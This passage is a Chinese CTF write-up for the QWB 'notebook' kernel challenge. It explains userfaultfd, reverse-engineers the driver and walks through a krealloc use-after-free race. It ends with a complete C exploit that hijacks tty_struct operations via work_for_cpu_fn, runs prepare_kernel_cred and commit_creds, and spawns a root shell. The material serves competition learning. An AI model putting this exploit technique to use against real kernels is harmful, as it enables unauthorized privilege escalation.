uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
errExit("ioctl-UFFDIO_API");
/* Create a private anonymous mapping. The memory will be
demand-zero paged--that is, not yet allocated. When we
actually touch the memory, it will be allocated via
the userfaultfd. */
addr = mmap(NULL, len, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (addr == MAP_FAILED)
errExit("mmap");
printf("Address returned by mmap() = %p\n", addr);
/* Register the memory range of the mapping we just created for
handling by the userfaultfd object. In mode, we request to track
missing pages (i.e., pages that have not yet been faulted in). */
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
errExit("ioctl-UFFDIO_REGISTER");
/* Create a thread that will process the userfaultfd events */
s = pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd);
if (s != 0) {
errno = s;
errExit("pthread_create");
}
/* Main thread now touches memory in the mapping, touching
locations 1024 bytes apart. This will trigger userfaultfd
events for all pages in the region. */
int l;
l = 0xf; /* Ensure that faulting address is not on a page
boundary, in order to test that we correctly
handle that case in fault_handling_thread() */
while (l < len) {
char c = addr[l];
printf("Read address %p in main(): ", addr + l);
printf("%c\n", c);
l += 1024;
usleep(100000); /* Slow things down a little */
}
exit(EXIT_SUCCESS);
}
情况如下:
我们可以参考到,在mmap之后也就是最上面的红线所得到的地址,我们在第一次访问他时出现了缺页异常,因此我们的轮询线程检测到我们之前定义的监控范围内出现异常,这使得该函数可以继续运行,因此将该内存区域填充A,所以在我们处理完了用户版的缺页异常后,该内存区域内全是A。
说了这么多我们会发现利用他是如此繁琐的一个过程,所以干脆咱们现在来写一个userfaultfd的万能板子,到时候写题就不需要重新回顾这些变量名了:
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <poll.h>
#define errExit(msg) do{ perror(msg); exit(EXIT_FAILURE); \
} while(0)
static int page_size;
int userfaultfd_attack(char* addr, unsigned long len, void (*handler)(void *)){
long uffd;
pthread_t thr;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;
/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if(uffd == -1)
errExit("userfaultfd");
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if(ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
errExit("ioctl-UFFDIO_API");
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if(ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
errExit("ioctl-UFFDIO_REGISTER");
/* Create a thread that will process the userfaultfd events */
s = pthread_create(&thr, NULL, handler, (void *)uffd);
if(s != 0){
errno = s;
errExit("pthread_create");
}
}
有了上面的代码,我们就可以只需要使用userfaultfd_attack(addr, len, handler)
就可以避免刚才咱们的一系列初始化步骤了,之后就是比较重要的handler函数的编写,这一部分更主要的是靠我们在赛时自行思考diy,这里给出较为通用的模板,也就是linux手册上面的,如下:
static char* page; /* the data you want to overwrite */
static void* fault_handler_thread(void * arg){
static struct uffd_msg msg; /* data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */
struct uffdio_copy uffdio_copy;
ssize_t nread;
uffd = (long)arg;
/* Loop, handling incoming events on the userfaultfd file descriptor */
for(;;){
/* See what poll() tells us about the userfaultfd */
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if(nready == -1)
errExit("poll");
/* Read an event from the userfaultfd */
nread = read(uffd, &msg, sizeof(msg));
if(nread == 0){
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}
if(nread == -1)
errExit("read");
/* We expect only one king of evenr; verify that assuption */
if(msg.event != UFFD_EVENT_PAGEFAULT){
fprintf(strerr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}
/* copy things to the addr */
uffdio_copy.src = (unsigned long) page;
/* We need to handle page faults in units of pages(!).
* So, round faulting address down to page boundary */
uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if(ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");
}
}
2. 题目逆向
首先,启动脚本
qemu-system-x86_64 -m 64M \
-kernel bzImage \
-initrd rootfs.cpio \
-append "loglevel=0 console=ttyS0 oops=panic panic=1 kaslr" \
-nographic \
-net user -net nic -device e1000 -smp cores=2,threads=2 -cpu kvm64,+smep,+smap \
-monitor /dev/null 2>/dev/null -s \
-no-reboot
- 双核双线程
- 开启kaslr
- smep/smap开启
- kpti开启
:disappointed: 很特么绝望,跟uesrland第一次看到保护全开一片绿的感觉,然后我们查看文件系统的init脚本,如下:
#!/bin/sh
/bin/mount -t devtmpfs devtmpfs /dev
chown root:tty /dev/console
chown root:tty /dev/ptmx
chown root:tty /dev/tty
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
mount -t proc proc /proc
mount -t sysfs sysfs /sys
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifup eth0 > /dev/null 2>/dev/null
chown root:root /flag
chmod 600 /flag
insmod notebook.ko
cat /proc/modules | grep notebook > /tmp/moduleaddr
chmod 777 /tmp/moduleaddr
chmod 777 /dev/notebook
#poweroff -d 300 -f &
echo "Welcome to QWB!"
#sh
setsid cttyhack setuidgid 1000 sh
umount /proc
umount /sys
poweroff -d 1 -n -f
发现插入了一个notebook.ko模块,然后我们运行该内核看看基本情况
/ $ uname -a
Linux (none) 4.15.8 #3 SMP Thu Jun 3 01:01:56 PDT 2021 x86_64 GNU/Linux
/ $ lsmod
Module Size Used by Tainted: G
notebook 16384 0
/ $ dmesg
dmesg: klogctl: Operation not permitted
可以看到令我们欣慰的一点是内核版本还不算很高 :happy:,然后我们打开ida反编译一下notebook.ko看看
.rodata:0000000000000800 ; ===========================================================================
.rodata:0000000000000800
.rodata:0000000000000800 ; Segment type: Pure data
.rodata:0000000000000800 ; Segment permissions: Read
.rodata:0000000000000800 _rodata segment align_32 public 'CONST' use64
.rodata:0000000000000800 assume cs:_rodata
.rodata:0000000000000800 ;org 800h
.rodata:0000000000000800 ; const file_operations mynote_fops
.rodata:0000000000000800 C0 09 00 00 00 00 00 00 00 00+mynote_fops file_operations <offset __this_module, 0, 0, offset mynote_write, 0, 0, 0, 0, 0, \
.rodata:0000000000000800 00 00 00 00 00 00 00 00 00 00+ ; DATA XREF: .data:mynote_dev↓o
.rodata:0000000000000800 00 00 00 00 80 00 00 00 00 00+ offset mynote_ioctl, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0>
.rodata:0000000000000800 00 00 00 00 00 00 00 00 00 00+_rodata ends
.rodata:0000000000000800 00 00 00 00 00 00 00 00 00 00+
__mcount_loc:00000000000008F8 ; ===========================================================================
__mcount_loc:00000000000008F8
__mcount_loc:00000000000008F8 ; Segment type: Pure data
__mcount_loc:00000000000008F8 ; Segment permissions: Read
__mcount_loc:00000000000008F8 __mcount_loc segment qword public 'CONST' use64
__mcount_loc:00000000000008F8 assume cs:__mcount_loc
__mcount_loc:00000000000008F8 ;org 8F8h
__mcount_loc:00000000000008F8 00 00 00 00 00 00 00 00 dq offset mynote_read
__mcount_loc:0000000000000900 80 00 00 00 00 00 00 00 dq offset mynote_write
__mcount_loc:0000000000000908 10 01 00 00 00 00 00 00 dq offset noteadd
__mcount_loc:0000000000000910 00 02 00 00 00 00 00 00 dq offset notedel
__mcount_loc:0000000000000918 80 02 00 00 00 00 00 00 dq offset noteedit
__mcount_loc:0000000000000920 90 03 00 00 00 00 00 00 dq offset notegift
__mcount_loc:0000000000000928 E0 03 00 00 00 00 00 00 dq offset mynote_ioctl
__mcount_loc:0000000000000930 74 04 00 00 00 00 00 00 dq offset mynote_init
__mcount_loc:0000000000000930 __mcount_loc ends
一个一个看吧 :bomb:
mynote_init
本身为加载一个misc设备的初始化函数,如下:
int __cdecl mynote_init()
{
int v0; // ebx
_fentry__();
v0 = misc_register(&mynote_dev); //内核维护一个misc_list链表,misc设备在misc_register注册的时候链接到这个链表
_rwlock_init(&lock, "&lock", &krealloc); //初始化一个读写锁
printk("Welcome to BrokenNotebook!\n");
return v0;
}
这里涉及到一个Linux中读写锁rwlock的概念
rwlock 主要有以下几种特征:
- 多进程对临界区的读不互斥,可同步进行,互不影响
- 如果要执行写,需要等所有的读者退出才能执行写操作
- 如果正在执行写操作且未完成,这一阶段发生的读操作会被阻塞,即读写互斥
- 如果正在执行写操作且未完成,这一阶段发生的读操作会被阻塞,即写写互斥
- 不造成睡眠,等待形式是自旋
这种场景有点像行人过马路,公交车司机必须停在斑马线前等待所有行人过完马路才能继续往前开,在繁忙的时段,不断地有行人走过,就会导致公交车一直止步不前,甚至造成堵车。
这也是 rwlock 的一大缺点:写者优先级太低,在极端情况下甚至出现饿死的情况,也即是说该锁是一个读优先锁
mynote_exit
撤销该驱动时的退出函数
void __cdecl mynote_exit()
{
note *v0; // rbx
void *note; // rdi
v0 = notebook;
do
{
note = v0->note;
++v0;
kfree(note);
}
while ( v0 != ¬ebook[16] );
misc_deregister(&mynote_dev);
}
mynote_ioctl
覆盖了ioctl函数,如下:
__int64 __fastcall mynote_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
{
__int64 v3; // rdx
userarg notearg; // [rsp+0h] [rbp-28h] BYREF
_fentry__(file, cmd, arg);
copy_from_user(¬earg, v3, 24LL);
if ( cmd == 0x100 )
return noteadd(notearg.idx, notearg.size, notearg.buf);
if ( cmd <= 0x100 )
{
if ( cmd == 0x64 )
return notegift(notearg.buf);
}
else
{
if ( cmd == 0x200 )
return notedel(notearg.idx);
if ( cmd == 0x300 )
return noteedit(notearg.idx, notearg.size, notearg.buf);
}
printk("[x] Unknown ioctl cmd!\n");
return -100LL;
}
我们得以知道在调用ioctl函数时,首先需要传递一个大小为24字节的数据结构,然后将其复制到上面的notearg
当中,然后存在下面几个选项
notearg(0x18) |
idx(0x8) |
size(0x8) |
buf(0x8) |
- 0x100:以
notearg
为参数,调用noteadd
,也就是添加notebook;
- 0x64:调用
notegift
, 泄露notebook数组内容, 该notebook就是note数据结构作为元素的数组,里面包含了一系列内核地址,也就是说kaslr不值一提😊
- 0x200:调用
notedel
, 根据idx来删除对应内核堆块,以及notebook相应的idx中的size来确定是否置空指针来置空指针,这里是因为其size在del的时候不可为0,即使使用noteedit
- 0x300:以
notearg
为参数,调用noteedit
,用来修改notebook单元中的size(不可为0)和note字段
这里我们还有一个notebook的数据结构
noteadd(read_lock)
使用我们传入的userarg结构体,其中要求idx不能大于0xF,以及size不能大于0x60,还有就是本身的note指针不能有值,不然都会直接返回
若上述条件均满足,我们就可以将我们userarg中的buf参数值传递给内核bss段上的name了,注意这里并不是note的值,此时内核就会使用kmalloc(size, _GFP*)来申请一个object给我们notebook对应下标的note值,这里使用了读锁,但并没太大关系
__int64 __fastcall noteadd(size_t idx, size_t size, void *buf)
{
__int64 content_0; // rdx
__int64 content_1; // r13
note *note_addr; // rbx
size_t orig_size; // r14
__int64 ret_value; // rbx
(_fentry__)(idx, size, buf);
if ( idx > 0xF ) //idx最大0xF
{
ret_value = -1LL;
printk("[x] Add idx out of range.\n");
}
else
{
content_1 = content_0;
note_addr = ¬ebook[idx]; //notebook为bss段上的值,这里是取相应idx对应的地址
raw_read_lock(&lock);
orig_size = note_addr->size; //取本来地址块的size位,用来进行可能的还原
note_addr->size = size; //填入我们传入的size
if ( size > 0x60 ) //如果说size大于0x60,则进行还原size
{
note_addr->size = orig_size;
ret_value = -2LL;
printk("[x] Add size out of range.\n");
}
else
{
copy_from_user(name, content_1, 256LL); //该name也是一个bss上的值,此时将我们的传递的notearg.buf传递给他
if ( note_addr->note ) //若本身存在note,依然还原size
{
note_addr->size = orig_size;
ret_value = -3LL;
printk("[x] Add idx is not empty.\n");
}
else
{
note_addr->note = _kmalloc(size, 0x24000C0LL); //内核分配块
printk("[+] Add success. %s left a note.\n", name);
ret_value = 0LL;
}
}
raw_read_unlock(&lock);
}
return ret_value;
}
notegift
该法会将notebook的内容传递给我们的userarg.buf,出题人很温柔:hibiscus:
__int64 __fastcall notegift(void *buf)
{
_fentry__(buf);
printk(" The notebook needs to be written from beginning to end.\n");
copy_to_user(buf, notebook, 256LL); //传递内核地址给用户奥,太棒了
printk(" For this special year, I give you a gift!\n");
return 100LL;
}
notedel(write_lock)
通过给定的idx来删除堆块,这里我们看到,首先是一个加了一个写锁,很难绷,然后获取相应idx的note后,调用kfree,挂在kmem_cache上?然后根据size来判断是否将对应位清0,但是按照正常单线程的话这个值不会为0的,即使调用noteedit也不会出现这种情况
__int64 __fastcall notedel(size_t idx)
{
note *v1; // rbx
_fentry__(idx);
if ( idx > 0x10 )
{
printk("[x] Delete idx out of range.\n");
return -1LL;
}
else
{
raw_write_lock(&lock);
v1 = ¬ebook[idx];
kfree(v1->note);
if ( v1->size ) //v1->size不为0才会清空
{
v1->size = 0LL;
v1->note = 0LL;
}
raw_write_unlock(&lock);
printk("[-] Delete success.\n");
return 0LL;
}
}
mynote_read
读notebook的内容奥,这时我们将读取我们rdx参数指向的对应note至我们的buf那儿
ssize_t __fastcall mynote_read(file *file, char *buf, size_t idx, loff_t *pos)
{
unsigned __int64 v4; // rdx
unsigned __int64 v5; // rdx
size_t size; // r13
void *note; // rbx
_fentry__(file, buf, idx);
if ( v4 > 0x10 )
{
printk("[x] Read idx out of range.\n");
return -1LL;
}
else
{
v5 = v4;
size = notebook[v5].size;
note = notebook[v5].note;
_check_object_size(note, size, 1LL);
copy_to_user(buf, note, size);
printk(" Read success.\n");
return 0LL;
}
}
mynote_write
可以看到,这里我们才是真正的写入了note结构体中的note字段,即使在addnote的时候我们也并没有在其中赋值
ssize_t __fastcall mynote_write(file *file, const char *buf, size_t idx, loff_t *pos)
{
unsigned __int64 v4; // rdx
unsigned __int64 v5; // rdx
size_t size; // r13
void *note; // rbx
_fentry__(file);
if ( v4 > 0x10 )
{
printk("[x] Write idx out of range.\n", buf);
return -1LL;
}
else
{
v5 = v4;
size = notebook[v5].size;
note = notebook[v5].note;
_check_object_size(note, size, 0LL);
if ( copy_from_user(note, buf, size) )
printk("[x] copy from user error.\n");
else
printk(" Write success.\n");
return 0LL;
}
}
noteedit(read_lock)
有读锁,我们的新name是我们的userarg.buf,然后我们会调用krealloc来重新分配堆块,这里会判断size是否为0,所以我们也无法通过传递size为0来使用UAF
__int64 __fastcall noteedit(size_t idx, size_t newsize, void *buf)
{
__int64 v3; // rdx
__int64 v4; // r13
note *v5; // rbx
size_t size; // rax
__int64 v7; // r12
__int64 v8; // rbx
_fentry__(idx);
if ( idx > 0xF )
{
v8 = -1LL;
printk("[x] Edit idx out of range.\n", newsize);
return v8;
}
v4 = v3;
v5 = ¬ebook[idx];
raw_read_lock(&lock);
size = v5->size;
v5->size = newsize;
if ( size == newsize )
{
v8 = 1LL;
goto editout;
}
v7 = (*krealloc.gap0)(v5->note, newsize, 37748928LL); //用于重新为让p执行一段新申请的内存,但是保持p指针指向内存中的内容不变,通俗讲就是为p重新申请一段内存,再将p之前内存中的内容复制过来.如果说此时newsize为0,则会释放该堆块,且不做任何操作
copy_from_user(name, v4, 256LL);
if ( !v5->size ) //传0是不阔以哒
{
printk("free in fact");
v5->note = 0LL;
v8 = 0LL;
goto editout;
}
if ( _virt_addr_valid(v7) )
{
v5->note = v7;
v8 = 2LL;
editout:
raw_read_unlock(&lock);
printk("[o] Edit success. %s edit a note.\n", name);
return v8;
}
printk("[x] Return ptr unvalid.\n");
raw_read_unlock(&lock);
return 3LL;
}
3. 利用思路
Krealloc , pwn:v:肯定有点熟悉这个realloc,在这里也是类似的,他的功能就是重新分配堆块,如果传入size为0,则会释放掉他。
我们之前经过分析,这个notedel好像可以使得size为0,然后UAF,事实上也确实如此。
接下来我们试想这样一个场景:
- 存在线程1,线程2,并且其都会通过
copy from user
or copy to user
for accessing the userland.
- 也就是说可以满足我们访问用户区域的条件,此时虽然存在多线程问题,但是触发条件十分艰巨,也就是说我们想要触发我们希望的修改条件,让他们自己跑的话是十分复杂且困难的,就拿两个线程来说,我们需要满足线程1在执行完语句n之后,需要线程2立刻执行自己区域的语句z,然后再回到线程1执行n+1.我们可以料想到这是有多么复杂
- 一切都要归于时间片,他实在是太短且不太好预测,所以线程切换的时间也不是我们可以任意控制的,因此我们可以想到,如果让线程1再执行到需要语句的时候即使阻塞呢,然后再调用了线程2,这样就可以达成我们需要的调用链
- 因此这里我们采用
userfaultfd
来达成该效果,调用监听线程来使得某线程阻塞,无限拉大线程切换的过程,使我们有足够的时间来做小动作
4.漏洞利用
:one: 使用mmap构造匿名映射区域,将其传入内核,并且将该区域使用userfaultfd来进行监控,到适当时间我们就将他阻塞
:two: 在noteedit的时候,我们如果传入size为0,他会调用krealloc来将我们原本的note->note块释放,然后他会调用copy_from_user
函数,会访问我们用户传入的指针,然后监控线程检测到缺页访问,因此挂起该线程执行操作,但此时我们的note->note是仍然为释放后的堆地址的,且size位为0,因此就达成了一个UAF的条件 ,但是这里我们仍需要将size位置为非零值,因为我们总是要结束线程的,即使他理论上可以延长无限值。如果结束userfaultfd的时候size仍然为0,则按照ida反编译的情况来查看,他会覆盖掉我们的UAF地址,这样就会出现一个非预期错误。
然后size的修改我们采用noteadd函数当中的值,我们发现他是先修改掉size,然后会有个与用户交换数据的过程,此时我们再触发一次userfaultfd
就可以了
:three: 此时如果我们在之前的note的大小为我们特殊构造的话,例如0x2e0,此时我们可以利用tty_struct
来泄露内核的基地址,所以我们此时选则打开ptmx设备,而我们的tty_struct本身是可以泄露内核基地址的,在初始化tty_struct的时候,其中的tty_opreations
会初始化为ptm_unix98_ops
或pty_unix98_ops
这两个全局变量,是谁是随机的,所以我们需要有一个判断,这里有一个坑点是我们从objdump -d vmlinux > symtable
中的symtable是找不出这两个全局变量的,我们可以把vmlinunx拖入ida中来查找
这里有个难以理解的点就是,我们的tty_struct可能存在分配失败的情况,如下:
:four: 当我们构造了UAF的tty_struct
后,我们就可以将我们的fake_operations
布置在我们的notebook数组当中,这样我们可以任意修改其中的函数指针,就可以尽情的利用它了!
:five: 但是本题基本上能开的保护差不多都开了,所以我们的链条有点难构造,这里有一个小tips,介绍一种在多核内核下基本存在的一个函数work_for_cpu_fn
__int64 __fastcall work_for_cpu_fn(__int64 a1)
{
__int64 result; // rax
_fentry__();
result = (*(a1 + 0x20))(*(a1 + 0x28));
*(a1 + 0x30) = result;
return result;
}
可以发现该函数的一个功能就是调用*(rdi+0x20)(rdi + 0x28)这个函数,然后我们的返回值存放在(rdi+0x30)当中,而我们的file_operations
上的函数第一个参数一般都是tty__struct
,所以说我们就可以分次来调用preapare_kernel_cred(NULL)
和commit_creds()
来进行提权,然后我们只需要正常的返回用户态即可,并不需要进行ROP里面的各类绕过,不用找那么多gadget了,很舒服。
:six: 最后我们需要恢复之前的tty_struct就正常返回调用system
就可以了
5.结果&Exploit
如图,可达成稳定提权,下面就是本次的exp:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <syscall.h>
#include <poll.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <sched.h>
#define errExit(msg) do{ perror(msg); exit(EXIT_FAILURE); \
} while(0)
size_t commit_creds = NULL;
size_t prepare_kernel_cred = NULL;
int note_fd = 0;
int tty_fd = 0;
sem_t evil_add_sem, evil_edit_sem;
static char* page = "abcd";
static int page_size;
size_t PTM_UNIX98_OPS = 0xFFFFFFFF81E8E440;
size_t PTY_UNIX98_OPS = 0xFFFFFFFF81E8E320;
size_t WORK_FOR_CPU_FN = 0xffffffff8109eb90;
size_t PREPARE_KERNEL_CRED = 0xffffffff810a9ef0;
size_t COMMIT_CREDS = 0xffffffff810a9b40;
struct userarg{
size_t idx;
size_t size;
void* buf;
};
#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, x)
void saveStatus();
void info_log(char*);
void error_log(char*);
int userfaultfd_attack(char* addr, unsigned long len, void (*handler)(void *));
static void* fault_handler_thread(void * arg);
void addnote(size_t idx, size_t size, char* buf);
void editnote(size_t idx, size_t size, char* buf);
void deletenote(size_t idx);
void gift(char* buf);
void bind_cpu(int);
size_t user_cs, user_ss,user_rflags,user_sp;
void saveStatus(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
info_log("States has been saved successfully!");
}
void info_log(char* str){
printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}
void error_log(char* str){
printf("\033[0m\033[1;31m[-]%s\033[0m\n",str);
exit(1);
}
/* to run the exp on the specific core only */
void bind_cpu(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
info_log("CPU bind succesfully");
}
int userfaultfd_attack(char* addr, unsigned long len, void (*handler)(void *)){
PRINT_ADDR("starting to monitor", addr);
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
pthread_t monitor_thread;
int s;
/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if(uffd == -1)
errExit("userfaultfd");
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if(ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
errExit("ioctl-UFFDIO_API");
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if(ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
errExit("ioctl-UFFDIO_REGISTER");
/* Create a thread that will process the userfaultfd events */
s = pthread_create(&monitor_thread, NULL, handler, (void *)uffd);
info_log("create thread...");
if(s != 0){
errno = s;
errExit("pthread_create");
}
}
static void* fault_handler_thread(void * arg){
static struct uffd_msg msg; /* data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */
struct uffdio_copy uffdio_copy;
ssize_t nread;
uffd = (long)arg;
/* Loop, handling incoming events on the userfaultfd file descriptor */
for(;;){
/* See what poll() tells us about the userfaultfd */
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if(nready == -1)
errExit("poll");
/* Read an event from the userfaultfd */
info_log("catch the user page fault!");
nread = read(uffd, &msg, sizeof(msg));
sleep(10000);
if(nread == 0){
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}
if(nread == -1)
errExit("read");
/* We expect only one king of evenr; verify that assuption */
if(msg.event != UFFD_EVENT_PAGEFAULT){
fprintf(stderr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}
/* copy things to the addr */
uffdio_copy.src = (unsigned long) page;
/* We need to handle page faults in units of pages(!).
* So, round faulting address down to page boundary */
uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if(ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");
}
}
void addnote(size_t idx, size_t size, char* buf){
struct userarg userargs;
userargs.idx = idx;
userargs.size = size;
userargs.buf = buf;
ioctl(note_fd, 0x100, &userargs);
}
void gift(char* buf){
struct userarg userargs;
userargs.idx = 0;
userargs.size = 10;
userargs.buf = buf;
ioctl(note_fd, 0x64, &userargs);
}
void editnote(size_t idx, size_t size, char* buf){
struct userarg userargs;
userargs.idx = idx;
userargs.size = size;
userargs.buf = buf;
ioctl(note_fd, 0x300, &userargs);
}
void deletenote(size_t idx){
struct userarg userargs;
userargs.idx = idx;
userargs.size = 0x10;
userargs.buf = 0;
ioctl(note_fd, 0x200, &userargs);
}
void thread_add(void* uffd_arg){
sem_wait(&evil_add_sem);
addnote(0, 0x60, uffd_arg);
}
void thread_edit(void* uffd_arg){
sem_wait(&evil_edit_sem);
editnote(0, 0, uffd_arg);
}
void main(){
bind_cpu(0);
page_size = sysconf(_SC_PAGE_SIZE);
note_fd = open("/dev/notebook", 2);
size_t fake_tty_struct[0x100], orig_tty_struct[0x100];
size_t fake_tty_operations_addr;
size_t vmlinux_offset;
size_t buf[0x30] = {0};
/* construct a monitored zone */
char* user_mmap = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
userfaultfd_attack(user_mmap, 0x1000, fault_handler_thread);
/*init the semaphore, and the value firstly be given a zero*/
sem_init(&evil_add_sem, 0, 0);
sem_init(&evil_edit_sem, 0, 0);
pthread_t thread_1, thread_2;
pthread_create(&thread_1, NULL, thread_add, (void*)user_mmap);
pthread_create(&thread_2, NULL, thread_edit, (void*)user_mmap);
addnote(0, 0x50, buf);
editnote(0, 0x2e0, buf);
sem_post(&evil_edit_sem); //we could run the thread_edit to get a UAF
sleep(1);
sem_post(&evil_add_sem); //use that to modify the size for 0 to not 0
sleep(1);
/* now we get a UAF chunk(0x2e0) with no zero size, so we can get the tty_struct*/
info_log("try to get the tty_struct");
tty_fd = open("/dev/ptmx", 2);
if(tty_fd <=0){
error_log("ptmx open failed");
}
read(note_fd, orig_tty_struct, 0);
if(*(int*)orig_tty_struct != 0x5401){ //mey be failed
error_log("pity,get a wrong tty!");
}
info_log("get right tty_struct!congratulation!");
/* get the kernel base offset */
vmlinux_offset = ((orig_tty_struct[3]&0xfff) == 0x440) ? (orig_tty_struct[3] - PTM_UNIX98_OPS): (orig_tty_struct[3] - PTY_UNIX98_OPS);
PRINT_ADDR("vmlinux_offset", vmlinux_offset);
/* hijack the tty_operations */
memcpy(fake_tty_struct, orig_tty_struct, 0x100);
addnote(1, 0x60, buf);
editnote(1, 0x2e0, buf);
gift(buf);
fake_tty_operations_addr = buf[2];
fake_tty_struct[3] = buf[2];
PRINT_ADDR("fake_tty_fops", fake_tty_struct[3]);
write(note_fd, fake_tty_struct,0);
buf[12] = WORK_FOR_CPU_FN + vmlinux_offset;
write(note_fd, buf, 1);
info_log("hijack done !");
/* construct the gadget */
/* prepare_kernel_cred(NULL) */
memcpy(fake_tty_struct, orig_tty_struct, 0x2e0);
fake_tty_struct[3] = fake_tty_operations_addr;
fake_tty_struct[4] = PREPARE_KERNEL_CRED + vmlinux_offset;
fake_tty_struct[5] = 0;
write(note_fd, fake_tty_struct, 0);
ioctl(tty_fd, 0x114514, 0x114514);
/* commit_creds */
read(note_fd, buf, 0);
fake_tty_struct[5] = buf[6];
fake_tty_struct[4] = COMMIT_CREDS + vmlinux_offset;
write(note_fd, fake_tty_struct, 0);
ioctl(tty_fd, 0x123, 0x123);
/* previledge evaluation finished */
/* recover the tty_struct */
write(note_fd, orig_tty_struct, 0);
system("/bin/sh");
}